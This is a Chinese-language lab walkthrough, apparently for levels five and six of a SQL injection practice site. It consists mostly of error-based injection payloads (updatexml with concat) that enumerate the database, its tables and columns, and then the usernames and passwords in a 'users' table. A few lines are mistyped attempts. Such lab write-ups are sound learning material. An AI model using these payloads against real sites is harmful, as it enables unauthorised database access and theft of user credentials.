第五关
先判断注入方式
输入URL/?id=1' 异常,如果去掉1'发现前后引号完全闭合,所以这应该就是注入方式
这里使用的是报错注入
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'),0x7e),1) --+
他说子查询返回1行以上,所以我们需要加点东西
改成这样的
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) --+
limit 0,1 第一个
limit 1,1 第二个
limit 2,1 第三个
limit 3,1 第四个
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 0,1),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 1,1),0x7e),1) --+ 这里只改了limit 1,1
?id=1' and updatexml(1,concat(0x7e,(select id from users limit 0,1),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select id from users limit 0,1),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
第六关
注入方式不同,其他同第五关
ID:1"
ID:1" and 1=2--
ID:1" and 1=2--
ID:1" and 1=1--
ID:1" and 1=1--
ID:1" and 1=2--
ID:1" and 1=2 --
ID:1" and update(1,concat(0x7e,(select database()),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information schema.tables where table_name = 'security'),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_name = 'security'),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security'),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 1,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 2,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 3,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 1,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 2,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) --